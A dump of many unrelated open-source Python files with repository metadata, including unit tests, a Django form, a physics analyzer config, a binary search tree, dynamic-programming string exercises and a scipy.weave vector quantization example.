                torch.save(model, save_dir + '/' + str(global_step) + '.pth')
            global_step = global_step + 1
    writer.close()
| 34.437956 | 127 | 0.67677 |
92a10d1e1b8f68ea355dcdec3ec276875f0648db | 841 | py | Python | chorus/test/test_remover.py | mojaie/chorus | 63cbe4764ab2498b7b1da11a628bec01d03ca012 | [
"MIT"
] | 5 | 2018-03-23T04:56:17.000Z | 2022-03-04T15:54:39.000Z | chorus/test/test_remover.py | mojaie/chorus | 63cbe4764ab2498b7b1da11a628bec01d03ca012 | [
"MIT"
] | 4 | 2017-09-08T02:08:12.000Z | 2018-06-12T00:55:18.000Z | chorus/test/test_remover.py | mojaie/chorus | 63cbe4764ab2498b7b1da11a628bec01d03ca012 | [
"MIT"
] | 6 | 2018-01-22T22:21:20.000Z | 2021-03-25T04:47:11.000Z | #
# (C) 2014-2017 Seiji Matsuoka
# Licensed under the MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import unittest
from chorus import smilessupplier as ss
from chorus import remover
from chorus import v2000reader as reader
from chorus.demo import MOL
class TestRemover(unittest.TestCase):
    """Unit tests for the structure-cleanup helpers in `chorus.remover`."""

    def test_remove_water(self):
        """After removing waters, three atoms remain."""
        compound = ss.smiles_to_compound("CCO.O.O")
        remover.remove_water(compound)
        self.assertEqual(3, len(compound))

    def test_remove_salt(self):
        """After desalting, three atoms remain."""
        compound = ss.smiles_to_compound("CC[O-].[Na+]")
        remover.remove_salt(compound)
        self.assertEqual(3, len(compound))

    def test_remove_coordinated_metal(self):
        """Removing the coordinated metal drops exactly one atom (95 -> 94)."""
        compound = reader.mol_from_text(MOL["Cyanocobalamin"])
        self.assertEqual(95, len(compound))
        remover.remove_coordinated_metal(compound)
        self.assertEqual(94, len(compound))
| 27.129032 | 57 | 0.6956 |
1796b428e8bcb4326274d76b741b552125ab17bc | 58 | py | Python | variabili_visibilita.py | pieroit/python-base | 5e72854ef94e082a7c0bf757ce231a5031fd4017 | [
"MIT"
] | null | null | null | variabili_visibilita.py | pieroit/python-base | 5e72854ef94e082a7c0bf757ce231a5031fd4017 | [
"MIT"
] | null | null | null | variabili_visibilita.py | pieroit/python-base | 5e72854ef94e082a7c0bf757ce231a5031fd4017 | [
"MIT"
] | null | null | null |
# Demonstrates variable visibility: a `while` body does not create a new
# scope in Python, so the assignment inside the loop rebinds the same
# module-level name `a`.
a = 20

i = 0
while i < 10:
    i += 1
    a = 10  # rebinds the `a` defined above (no block scoping)

print(a)  # prints 10, not 20
| 6.444444 | 13 | 0.413793 |
c2e4582ba40ac299fe954fa7ebeb5e0e4453b2c4 | 294 | py | Python | app/Device.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | app/Device.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | app/Device.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | """Device Model."""
from config.database import Model
from orator.orm import has_many
class Device(Model):
    """Device Model."""

    # Mass-assignable columns for this table.
    __fillable__ = ['name', 'description']
    # Presumably the table has no created_at/updated_at columns — confirm.
    __timestamps__ = False

    @has_many
    def datas(self):
        # One device has many Data rows. Imported locally, apparently to
        # avoid a circular import between the Device and Data modules.
        from app.Data import Data
        return Data
| 18.375 | 42 | 0.64966 |
68a342636471ab0600994896836c5248a5b7539c | 1,539 | py | Python | tests/python/pants_test/engine/test_scheduler_integration.py | revl/pants | 8ad83e4ca80c095d44efceafd8b41e575da39c65 | [
"Apache-2.0"
] | 1 | 2020-06-13T22:01:39.000Z | 2020-06-13T22:01:39.000Z | tests/python/pants_test/engine/test_scheduler_integration.py | revl/pants | 8ad83e4ca80c095d44efceafd8b41e575da39c65 | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/engine/test_scheduler_integration.py | revl/pants | 8ad83e4ca80c095d44efceafd8b41e575da39c65 | [
"Apache-2.0"
] | 3 | 2020-06-30T08:28:13.000Z | 2021-07-28T09:35:57.000Z | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pathlib import Path
from pants.testutil.pants_run_integration_test import PantsRunIntegrationTest, ensure_daemon
from pants.util.contextutil import temporary_dir
class SchedulerIntegrationTest(PantsRunIntegrationTest):
def test_visualize_to(self):
# Tests usage of the `--native-engine-visualize-to=` option, which triggers background
# visualization of the graph. There are unit tests confirming the content of the rendered
# results.
with temporary_dir() as destdir:
args = [
f"--native-engine-visualize-to={destdir}",
"list",
"examples/src/scala/org/pantsbuild/example/hello/welcome",
]
self.assert_success(self.run_pants(args))
destdir_files = list(Path(destdir).iterdir())
self.assertTrue(len(destdir_files) > 0)
@ensure_daemon
def test_graceful_termination(self):
args = [
"--no-v1",
"--v2",
"list-and-die-for-testing",
"examples/src/scala/org/pantsbuild/example/hello/welcome",
]
pants_result = self.run_pants(args)
self.assert_failure(pants_result)
self.assertEqual(
pants_result.stdout_data,
"examples/src/scala/org/pantsbuild/example/hello/welcome:welcome\n",
)
self.assertEqual(pants_result.returncode, 42)
| 38.475 | 97 | 0.651722 |
048eed96a7e41a0216ca8b49476af346c498cb66 | 556 | py | Python | app/blog/forms.py | RohitKochhar/Django-Website | b83d158bb11eef8b924684c44580a4fb68b2d05c | [
"Apache-2.0"
] | null | null | null | app/blog/forms.py | RohitKochhar/Django-Website | b83d158bb11eef8b924684c44580a4fb68b2d05c | [
"Apache-2.0"
] | 1 | 2020-11-16T14:44:57.000Z | 2020-11-16T14:48:33.000Z | app/blog/forms.py | RohitKochhar/Django-Website | b83d158bb11eef8b924684c44580a4fb68b2d05c | [
"Apache-2.0"
] | null | null | null | from django import forms
class CommentForm(forms.Form):
s_Author = forms.CharField( max_length=60,
widget=forms.TextInput(attrs={
"class":"form-control",
"placeholder": "Your Name"
})
)
s_Body = forms.CharField(widget=forms.Textarea(
attrs={
"class": "form-control",
"placeholder": "Leave a comment!"
})
)
| 32.705882 | 62 | 0.402878 |
92c3d6328bd4d96f49da1794f04445d75bb94df7 | 3,015 | py | Python | DQMOffline/PFTau/python/PFMuonDQMAnalyzer_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQMOffline/PFTau/python/PFMuonDQMAnalyzer_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQMOffline/PFTau/python/PFMuonDQMAnalyzer_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
pfMuonDQMAnalyzer = cms.EDAnalyzer("PFMuonDQMAnalyzer",
InputCollection = cms.InputTag('muons'),
MatchCollection = cms.InputTag('gensource'),
BenchmarkLabel = cms.string('PFMuonValidation/PFMuonVsGenMuon'),
deltaRMax = cms.double(0.2),
matchCharge = cms.bool(True),
mode = cms.int32( 1 ),
CreateReferenceHistos = cms.bool(True),
CreateEfficiencyHistos = cms.bool(False),
ptMin = cms.double( 0.0 ), # since pT_reco seem to have this threshold
ptMax = cms.double( 999999 ),
etaMin = cms.double(-2.5),
etaMax = cms.double(2.5),
phiMin = cms.double(-3.14),
phiMax = cms.double(3.14),
# slimmed muons selection
slimmedLikeSelection = cms.bool(True),
ptBase = cms.double(5.0),
ptNotPF = cms.double(3.0),
# Histogram Parameters related to pt
#VariablePtBins = cms.vdouble(0.,1.,2.,5.,10.,20.,50.,100.,200.,400.,1000.),
VariablePtBins = cms.vdouble(0.), # if only one entry PtHistoParameter used
PtHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(60),
xMin = cms.double(0.0),
xMax = cms.double(120.0)
),
DeltaPtHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(100),
xMin = cms.double(-30.0),
xMax = cms.double(30.0)
),
DeltaPtOvPtHistoParameter = cms.PSet(
switchOn = cms.bool(True),
BROn = cms.bool(False), BREtaMin = cms.double(0.0), BREtaMax = cms.double(1.4),
EROn = cms.bool(False), EREtaMin = cms.double(1.6), EREtaMax = cms.double(2.4),
slicingOn = cms.bool(False),
nBin = cms.int32(160), #200
xMin = cms.double(-1.0),
xMax = cms.double(1.0)
),
# Histogram Parameters related to Eta
EtaHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(100),
xMin = cms.double(-5.0),
xMax = cms.double(5.0)
),
DeltaEtaHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(400),
xMin = cms.double(-0.2),
xMax = cms.double(0.2)
),
# Histogram Parameters related to Phi
PhiHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(100),
xMin = cms.double(-3.1416),
xMax = cms.double(3.1416)
),
DeltaPhiHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(400),
xMin = cms.double(-0.2),
xMax = cms.double(0.2)
),
DeltaRHistoParameter = cms.PSet(
switchOn = cms.bool(True),
nBin = cms.int32(150),
xMin = cms.double(0.0),
xMax = cms.double(1.0)
),
# Histogram Parameters related to Charge
ChargeHistoParameter = cms.PSet(
switchOn = cms.bool(False),
nBin = cms.int32(3),
xMin = cms.double(-1.5),
xMax = cms.double(1.5)
)
)
| 35.05814 | 85 | 0.577778 |
45feb8108cf4060a7b531b2b7d368d3f1950adbf | 2,321 | py | Python | binary_search_tree.py | cheungh/python | 8dff6c0cb52f85f23f6fffdb5edb4ac2849ce5ee | [
"MIT"
] | null | null | null | binary_search_tree.py | cheungh/python | 8dff6c0cb52f85f23f6fffdb5edb4ac2849ce5ee | [
"MIT"
] | null | null | null | binary_search_tree.py | cheungh/python | 8dff6c0cb52f85f23f6fffdb5edb4ac2849ce5ee | [
"MIT"
] | null | null | null | class Node:
data = None
right = None
left = None
parent = None
def __init__(self, data, parent=None):
self.data = data
self.parent = parent
def min(self):
node = self
while node.right:
node = node.right
return node
def max(self):
node = self
while node.left:
node = node.left
return node
class BST:
root_node = None
sorted_list = []
def __init__(self, data):
self.root_node = Node(data)
def insert(self, data):
if self.root_node is None:
self.root_node = Node(data)
else:
node = self.root_node
parent_node = None
while node:
# insert to left if data is less than root_node
if data > node.data:
if node.left:
node = node.left
else:
node.left = Node(data, node)
return node.left
break
# insert to left if data is greater than root_node
if data < node.data:
if node.right:
node = node.right
else:
node.right = Node(data, node)
return node.right
return node
def traverse(self, node):
"""
traverse tree
:param node:
:return:
"""
# base case
if node is None:
return
# start from right: smaller
self.traverse(node.right)
# current
self.sorted_list.append(node.data)
# end with left: larger
self.traverse(node.left)
def search(self, node, searched_node):
if node is None:
return False
while node:
if searched_node > node.data:
node = node.left
elif searched_node < node.data:
node = node.right
else:
return node
return False
a = BST(11)
a.insert(9)
a.insert(101)
a.insert(90)
a.insert(70)
a.insert(8)
a.insert(5)
a.insert(4)
a.insert(7)
a.insert(3)
a.traverse(a.root_node)
print a.sorted_list
a_node = a.search(a.root_node, 3)
print a_node.parent.data
| 24.177083 | 66 | 0.490737 |
86e89c1624a26f211bc2ec22c32d4545f49a9907 | 686 | py | Python | test_blood_cells_v4.py | 1xVinniThePuh/Comp_Visision | 251afc59cd86989daca8305bc825e33d01ab37fa | [
"MIT"
] | 2 | 2020-05-05T11:30:27.000Z | 2020-05-05T11:31:42.000Z | test_blood_cells_v4.py | 1xVinniThePuh/Comp_Visision | 251afc59cd86989daca8305bc825e33d01ab37fa | [
"MIT"
] | null | null | null | test_blood_cells_v4.py | 1xVinniThePuh/Comp_Visision | 251afc59cd86989daca8305bc825e33d01ab37fa | [
"MIT"
] | 1 | 2020-05-05T11:37:36.000Z | 2020-05-05T11:37:36.000Z | import cv2
import numpy as np
img = cv2.imread('eroded_10.jpg', 0)
img = cv2.medianBlur(img, 5)
cimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 20,
param1=50, param2=30, minRadius=0, maxRadius=0)
circles = np.uint16(np.around(circles))
count_cr = 0
for i in circles[0, :]:
count_cr += 1
# draw the outer circle
cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)
# draw the center of the circle
cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)
print('count_cr = ', count_cr)
cv2.imshow('detected circles', cimg)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 25.407407 | 76 | 0.609329 |
5d4a1e50819646fcebdbc61aa8b3ea7839dbf62a | 303 | py | Python | data/multilingual/Latn.TEM/Mono_12/pdf_to_json_test_Latn.TEM_Mono_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | 1 | 2021-09-19T19:47:35.000Z | 2021-09-19T19:47:35.000Z | data/multilingual/Latn.TEM/Mono_12/pdf_to_json_test_Latn.TEM_Mono_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | data/multilingual/Latn.TEM/Mono_12/pdf_to_json_test_Latn.TEM_Mono_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.TEM/Mono_12/udhr_Latn.TEM_Mono_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| 30.3 | 73 | 0.811881 |
7863858a9776e0d023da89d0bafc939f66d2f1fc | 584 | py | Python | install/app_store/tk-framework-desktopserver/v1.3.1/tests/fixtures/config/bundles/test_app/app.py | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | null | null | null | install/app_store/tk-framework-desktopserver/v1.3.1/tests/fixtures/config/bundles/test_app/app.py | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | null | null | null | install/app_store/tk-framework-desktopserver/v1.3.1/tests/fixtures/config/bundles/test_app/app.py | JoanAzpeitia/lp_sg | e0ee79555e419dd2ae3a5f31e5515b3f40b22a62 | [
"MIT"
] | 1 | 2020-02-15T10:42:56.000Z | 2020-02-15T10:42:56.000Z | # Copyright (c) 2017 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
"""
A dummy app
"""
from sgtk.platform import Application
class TestApp(Application):
def init_app(self):
pass
| 25.391304 | 76 | 0.748288 |
28eca14ebaee409dfd77295fd2785a337c3145b1 | 804 | py | Python | examples/beta_bernoulli_pymc3.py | caosenqi/Edward1 | 85f833d307512a585b85ebc2979445e17191ed81 | [
"Apache-2.0"
] | 1 | 2016-10-22T09:56:50.000Z | 2016-10-22T09:56:50.000Z | examples/beta_bernoulli_pymc3.py | caosenqi/Edward1 | 85f833d307512a585b85ebc2979445e17191ed81 | [
"Apache-2.0"
] | null | null | null | examples/beta_bernoulli_pymc3.py | caosenqi/Edward1 | 85f833d307512a585b85ebc2979445e17191ed81 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
A simple coin flipping example. The model is written in PyMC3.
Inspired by Stan's toy example.
Probability model
Prior: Beta
Likelihood: Bernoulli
Variational model
Likelihood: Mean-field Beta
"""
import edward as ed
import pymc3 as pm
import numpy as np
import theano
from edward.models import PyMC3Model, Variational, Beta
data_shared = theano.shared(np.zeros(1))
with pm.Model() as model:
beta = pm.Beta('beta', 1, 1, transform=None)
out = pm.Bernoulli('data',
beta,
observed=data_shared)
data = ed.Data(np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 1]))
m = PyMC3Model(model, data_shared)
variational = Variational()
variational.add(Beta())
inference = ed.MFVI(m, variational, data)
inference.run(n_iter=10000)
| 23.647059 | 62 | 0.677861 |
d0454f8bf5afad8d7c381d7e2e4a5faa61a7f182 | 80 | py | Python | tic_toc/__init__.py | nok/tic-toc | c777fe5ce505e483815d4183cb1b0ba04a1461bc | [
"MIT"
] | 1 | 2018-11-26T04:12:35.000Z | 2018-11-26T04:12:35.000Z | tic_toc/__init__.py | nok/tic-toc | c777fe5ce505e483815d4183cb1b0ba04a1461bc | [
"MIT"
] | null | null | null | tic_toc/__init__.py | nok/tic-toc | c777fe5ce505e483815d4183cb1b0ba04a1461bc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from tic_toc.Timer import Timer
__version__ = '0.1.2'
| 13.333333 | 31 | 0.6375 |
0c45e969e6fe32f17dbdeaef3658d42d0e0565cc | 2,102 | py | Python | TEST/BETAsite/Callout.py | takehuge/PYQUM | bfc9d9b1c2f4246c7aac3a371baaf587c99f8069 | [
"MIT"
] | null | null | null | TEST/BETAsite/Callout.py | takehuge/PYQUM | bfc9d9b1c2f4246c7aac3a371baaf587c99f8069 | [
"MIT"
] | null | null | null | TEST/BETAsite/Callout.py | takehuge/PYQUM | bfc9d9b1c2f4246c7aac3a371baaf587c99f8069 | [
"MIT"
] | null | null | null | # This is a template for calling out other programming platforms other than Python itself
# from ctypes import *
# calling VI using its activeX methods & properties
def Call_VI(VI_name): #None = []
import platform
platinfo = platform.system()
if platinfo is "Windows":
import comtypes.client
# Path to type library.
TypeLibPath = "C:/Program Files (x86)/National Instruments for 8/LabVIEW 2011/resource/labview.tlb"
comtypes.client.GetModule(TypeLibPath)
def wrapper(ctrl_params): # VIPath, ParameterNames, Parameters, Indicators=None
comtypes.CoInitialize()
unpack = VI_name(ctrl_params)
VIPath = unpack['VIPath']
ParameterNames = unpack['ParameterNames']
Parameters = unpack['Parameters']
Indicators = unpack['Indicators']
try:
Application = comtypes.client.CreateObject("LabVIEW.Application.8",...and
None, None, comtypes.gen.LabVIEW._Application)
#Get VI Reference (Application methods)
VirtualInstrument = Application.GetVIReference(VIPath)
#Open VI front panel in hidden mode (VI methods)
VirtualInstrument.OpenFrontPanel(True, 1) # 0 (Invalid), 1 (Standard: Background), 2 (Closed), 3 (Hidden), 4 (Minimized), and 5 (Maximized).
#Call VI
VirtualInstrument.Call(ParameterNames, Parameters) #Classic Control is not supported!
# VirtualInstrument.CloseFrontPanel()
if not Indicators:
data = []
else:
data = [VirtualInstrument.GetControlValue(i) for i in Indicators] # indexed (serialized) data
except:
VirtualInstrument = None
Application = None
raise # rethrow the exception to get the full trace on the console
return data
VirtualInstrument = None
Application = None
return wrapper
else: pass
| 38.218182 | 157 | 0.598002 |
d5de717ed60a896390d7e169af151355680f312b | 2,527 | py | Python | skgenome/tabio/picard.py | jeremy9959/cnvkit | b839a2b323113a7d318d216f61a0ed6657c70ed4 | [
"Apache-2.0"
] | null | null | null | skgenome/tabio/picard.py | jeremy9959/cnvkit | b839a2b323113a7d318d216f61a0ed6657c70ed4 | [
"Apache-2.0"
] | null | null | null | skgenome/tabio/picard.py | jeremy9959/cnvkit | b839a2b323113a7d318d216f61a0ed6657c70ed4 | [
"Apache-2.0"
] | null | null | null | """I/O for formats used by Picard tools.
- Interval list (also used in GATK)
- CalculateHsMetrics PER_TARGET_COVERAGE output
"""
from __future__ import absolute_import, division, print_function
import numpy as np
import pandas as pd
def read_interval(infile):
"""GATK/Picard-compatible interval list format.
Expected tabular columns:
chromosome, start position, end position, strand, gene
Coordinate indexing is from 1.
"""
dframe = pd.read_table(infile,
comment='@', # Skip the SAM header
names=["chromosome", "start", "end", "strand", "gene",
])
dframe["gene"].fillna('-', inplace=True)
dframe["start"] -= 1
return dframe
def read_picard_hs(infile):
"""Picard CalculateHsMetrics PER_TARGET_COVERAGE.
The format is BED-like, but with a header row and the columns::
chrom (str),
start, end, length (int),
name (str),
%gc, mean_coverage, normalized_coverage (float)
"""
dframe = pd.read_table(infile, na_filter=False, dtype={
"chrom": "str",
"start": "int",
"end": "int",
"length": "int",
"name": "str",
"%gc": "float",
"mean_coverage": "float",
"normalized_coverage": "float",
})
dframe.columns = ["chromosome", # chrom
"start", "end", "length",
"gene", # name
"gc", # %gc
"depth", "ratio"]
del dframe["length"]
dframe["start"] -= 1
return dframe
# _____________________________________________________________________
def write_interval(dframe):
dframe = dframe.copy()
dframe["start"] += 1
if "gene" not in dframe:
dframe["gene"] = '-'
if "strand" not in dframe:
dframe["strand"] = "+"
return dframe.loc[:, ["chromosome", "start", "end", "strand", "gene"]]
def write_picard_hs(dframe):
if "depth" in dframe.columns:
coverage = dframe["depth"]
norm = coverage / coverage.mean()
else:
coverage = np.exp2(dframe["log2"])
norm = coverage
return pd.DataFrame.from_items([
("chrom", dframe["chromosome"]),
("start", dframe["start"] + 1),
("end", dframe["end"]),
("length", dframe["end"] - dframe["start"]),
("name", dframe["gene"]),
("%gc", dframe["gc"]),
("mean_coverage", coverage),
("normalized_coverage", norm),
])
| 27.769231 | 81 | 0.556787 |
eeeddda3744c11de4c0cf722e13792136c17ab76 | 5,075 | py | Python | exercises/trees/canConstruct.py | iamnicoj/pythonplay | f847038524c59a5fe658712a2cf4f904ad52401e | [
"MIT"
] | null | null | null | exercises/trees/canConstruct.py | iamnicoj/pythonplay | f847038524c59a5fe658712a2cf4f904ad52401e | [
"MIT"
] | 6 | 2021-03-02T21:28:15.000Z | 2021-03-17T23:35:44.000Z | exercises/trees/canConstruct.py | iamnicoj/pythonplay | f847038524c59a5fe658712a2cf4f904ad52401e | [
"MIT"
] | null | null | null | import copy
def can_construct(target, word_bank):
return _can_construct(target, "", word_bank, {})
def _can_construct(target, concatenated, word_bank, memo):
if memo.get(concatenated, None) is not None:
return memo[concatenated]
if target is None or target == "":
return False
if target == concatenated:
return True
if concatenated != "" and target.find(concatenated,0) != 0:
return False
temp_concatenated = copy.deepcopy(concatenated)
for word in word_bank:
concatenated = temp_concatenated + word
result = _can_construct(target, concatenated, word_bank, memo)
memo[concatenated] = result
if result: return True
return False
# This algorithm can be implemented the other way around
# You can recursively check if each word is a prefix on the target
# then slice it out repitevely until you get an empty string and returnt True. False Otherwise
print(can_construct("",["as", "st", "te"])) # ?
print(can_construct("test",["as", "st", "t"])) # False
print(can_construct("test",["as", "st", "te"])) # True
print(can_construct("test",["as", "s", "e", "blue", "t"])) # True
print(can_construct("testinglikeakinginaworldofmuppets",["as", "s", "e", "blue", "t", "k", "o", "a", "i", "m", "u", "likeaking", "w"])) # False
print(can_construct("eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef",
['e',
'ee',
'eee',
'eeee',
'eeeee',
'eeeeee',
'eeeeeee',
'eeeeeeee',
'eeeeeeeee',
'eeeeeeeeee',
'eeeeeeeeeee',
'eeeeeeeeeeee',
'eeeeeeeeeeeee',
'eeeeeeeeeeeeee',
'eeeeeeeeeeeeeee',
'eeeeeeeeeeeeeeee'
])) # False
def count_construct(target, word_bank):
return _count_construct(target, word_bank, {})
def _count_construct(target, word_bank, memo):
if memo.get(target) is not None:
return memo.get(target)
if target == '':
return 1
temp_target = copy.deepcopy(target)
result = 0
for word in word_bank:
if target.find(word, 0) == 0:
second_temp_target = temp_target[slice(len(word), len(target))]
result += _count_construct(second_temp_target, word_bank, memo)
memo[target] = result
return result
print('count_construct')
print(count_construct("",["as", "st", "te"])) # ?
print(count_construct("test",["as", "st", "t"])) # False
print(count_construct("test",["as", "st", "te"])) # True
print(count_construct("test",["as", "s", "e", "blue", "t"])) # True
print(count_construct("testinglikeakinginaworldofmuppets",["as", "s", "e", "blue", "t", "k", "o", "a", "i", "m", "u", "likeaking", "w"])) # False
print(count_construct("eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef",
['e',
'ee',
'eee',
'eeee',
'eeeee',
'eeeeee',
'eeeeeee',
'eeeeeeee',
'eeeeeeeee',
'eeeeeeeeee',
'eeeeeeeeeee',
'eeeeeeeeeeee',
'eeeeeeeeeeeee',
'eeeeeeeeeeeeee',
'eeeeeeeeeeeeeee',
'eeeeeeeeeeeeeeee'
])) # False
def all_construct(target, word_bank):
return _all_construct(target, word_bank, {})
def _all_construct(target, word_bank, memo):
if memo.get(target, None) is not None:
return memo[target]
if target == '':
return [[]]
final_result = []
for word in word_bank:
if target.find(word, 0 ) == 0:
target_copy = copy.deepcopy(target)
target_second_copy = target_copy[slice(len(word), len(target))]
parcial_result = _all_construct(target_second_copy, word_bank, memo)
if len(parcial_result) > 0:
for array in parcial_result:
added_word = copy.deepcopy([word])
added_word.extend(array)
final_result.append(added_word)
memo[target] = final_result
return final_result
print('all_construct')
print(all_construct("",["as", "st", "te"])) # ?
print(all_construct("test",["as", "st", "t"])) # False
print(all_construct("test",["as", "st", "te", "e", "s", "t"])) # True
print(all_construct("test",["as", "s", "e", "blue", "t"])) # True
print(all_construct("testinglikeakinginaworldofmuppets",["as", "s", "e", "blue", "t", "k", "o", "a", "i", "m", "u", "likeaking", "w"])) # False
print(all_construct("eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef",
['e',
'ee',
'eee',
'eeee',
'eeeee',
'eeeeee',
'eeeeeee',
'eeeeeeee',
'eeeeeeeee',
'eeeeeeeeee',
'eeeeeeeeeee',
'eeeeeeeeeeee',
'eeeeeeeeeeeee',
'eeeeeeeeeeeeee',
'eeeeeeeeeeeeeee',
'eeeeeeeeeeeeeeee'
])) # False
| 32.954545 | 145 | 0.562759 |
c464044f3058ac6567a3a69662e8481bd6a4a060 | 9,322 | py | Python | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/scipy/weave/examples/vq.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2021-02-05T13:19:58.000Z | 2021-02-05T13:19:58.000Z | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/scipy/weave/examples/vq.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | 1 | 2018-04-15T22:59:15.000Z | 2018-04-15T22:59:15.000Z | tools/intogen/runtime/pyenv/lib/python2.7/site-packages/scipy/weave/examples/vq.py | globusgenomics/galaxy | 7caf74d9700057587b3e3434c64e82c5b16540f1 | [
"CC-BY-3.0"
] | null | null | null | """
"""
from __future__ import absolute_import, print_function
# C:\home\ej\wrk\scipy\weave\examples>python vq.py
# vq with 1000 observation, 10 features and 30 codes fo 100 iterations
# speed in python: 0.150119999647
# [25 29] [ 2.49147266 3.83021032]
# speed in standard c: 0.00710999965668
# [25 29] [ 2.49147266 3.83021032]
# speed up: 21.11
# speed inline/blitz: 0.0186300003529
# [25 29] [ 2.49147272 3.83021021]
# speed up: 8.06
# speed inline/blitz2: 0.00461000084877
# [25 29] [ 2.49147272 3.83021021]
# speed up: 32.56
from numpy import *
import sys
sys.path.insert(0,'..')
import scipy.weave.inline_tools as inline_tools
import scipy.weave.converters as converters
blitz_type_converters = converters.blitz
import scipy.weave.c_spec as c_spec
def vq(obs,code_book):
# make sure we're looking at arrays.
obs = asarray(obs)
code_book = asarray(code_book)
# check for 2d arrays and compatible sizes.
obs_sh = shape(obs)
code_book_sh = shape(code_book)
assert(len(obs_sh) == 2 and len(code_book_sh) == 2)
assert(obs_sh[1] == code_book_sh[1])
type = c_spec.num_to_c_types[obs.typecode()]
# band aid for now.
ar_type = 'PyArray_FLOAT'
code = """
#line 37 "vq.py"
// Use tensor notation.
blitz::Array<%(type)s,2> dist_sq(Ncode_book[0],Nobs[0]);
blitz::firstIndex i;
blitz::secondIndex j;
blitz::thirdIndex k;
dist_sq = sum(pow2(obs(j,k) - code_book(i,k)),k);
// Surely there is a better way to do this...
PyArrayObject* py_code = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_LONG);
blitz::Array<int,1> code((int*)(py_code->data),
blitz::shape(Nobs[0]), blitz::neverDeleteData);
code = minIndex(dist_sq(j,i),j);
PyArrayObject* py_min_dist = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_FLOAT);
blitz::Array<float,1> min_dist((float*)(py_min_dist->data),
blitz::shape(Nobs[0]), blitz::neverDeleteData);
min_dist = sqrt(min(dist_sq(j,i),j));
py::tuple results(2);
results[0] = py_code;
results[1] = py_min_dist;
return_val = results;
""" % locals()
code, distortion = inline_tools.inline(code,['obs','code_book'],
type_converters = blitz_type_converters,
compiler = 'gcc',
verbose = 1)
return code, distortion
def vq2(obs,code_book):
""" doesn't use blitz (except in conversion)
ALSO DOES NOT HANDLE STRIDED ARRAYS CORRECTLY
"""
# make sure we're looking at arrays.
obs = asarray(obs)
code_book = asarray(code_book)
# check for 2d arrays and compatible sizes.
obs_sh = shape(obs)
code_book_sh = shape(code_book)
assert(len(obs_sh) == 2 and len(code_book_sh) == 2)
assert(obs_sh[1] == code_book_sh[1])
assert(obs.typecode() == code_book.typecode())
type = c_spec.num_to_c_types[obs.typecode()]
# band aid for now.
ar_type = 'PyArray_FLOAT'
code = """
#line 83 "vq.py"
// THIS DOES NOT HANDLE STRIDED ARRAYS CORRECTLY
// Surely there is a better way to do this...
PyArrayObject* py_code = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_LONG);
PyArrayObject* py_min_dist = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_FLOAT);
int* raw_code = (int*)(py_code->data);
